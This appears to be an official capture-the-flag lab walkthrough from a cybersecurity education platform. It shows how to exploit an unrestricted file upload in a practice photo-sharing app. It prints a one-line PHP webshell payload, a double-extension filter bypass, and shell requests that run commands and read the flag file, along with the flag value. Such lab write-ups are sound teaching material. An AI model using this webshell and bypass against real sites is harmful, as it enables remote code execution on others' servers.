HACKR.GG
hackr.gg — Photo Upload — InstaSnap Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Photo Upload — InstaSnap

File Upload Vulnerabilities · Unrestricted File Upload / Webshell
Difficulty
Intermediate
Vuln class
Unrestricted File Upload / Webshell
Steps
5
// Objective
Upload a PHP webshell disguised as an image to InstaSnap's profile photo feature, then use it to execute commands on the server and retrieve the flag.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Test the upload endpoint normally
Log in and navigate to your profile. Upload a legitimate JPEG image to understand the normal flow. Note the URL where the uploaded file ends up — it is usually in a predictable path like /uploads/ or /media/.
Command / Input
Upload: profile.jpg → observe response URL /uploads/abc123/profile.jpg
2
Attempt to upload a PHP file directly
Rename a PHP file to test.php and try to upload it. The server may reject it based on extension. If so, you need to bypass the filter.
Command / Input
File: shell.php Content: <?php system($_GET["cmd"]); ?>
Output
Error: Only image files are allowed.
If the server only checks the file extension or MIME type in the HTTP request — not the actual file content — it can be bypassed.
3
Bypass the filter with a double extension
Many filters only check the last extension. Try naming your file with a double extension — the server may treat it as an image while the web server still executes it as PHP.
Command / Input
File: shell.php.jpg Content: <?php system($_GET["cmd"]); ?>
Output
Upload successful. File stored at /uploads/shell.php.jpg
Alternatively, if Burp Suite is available, intercept the upload request and change the filename from shell.jpg to shell.php after the filter has already passed.
4
Execute commands via the webshell
Navigate to the uploaded file URL and append a cmd parameter to run OS commands.
Command / Input
GET /uploads/shell.php.jpg?cmd=id
Output
uid=33(www-data) gid=33(www-data) groups=33(www-data)
You now have remote code execution as the web server user.
5
Read the flag
Use your webshell to cat the flag file from the server filesystem.
Command / Input
GET /uploads/shell.php.jpg?cmd=cat+/flag.txt
Output
HackrGG{f1l3_upl04d_w3bsh3ll_3x3c}
// Flag
Flag value
HackrGG{f1l3_upl04d_w3bsh3ll_3x3c}
Retrieved via remote code execution through the uploaded webshell.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute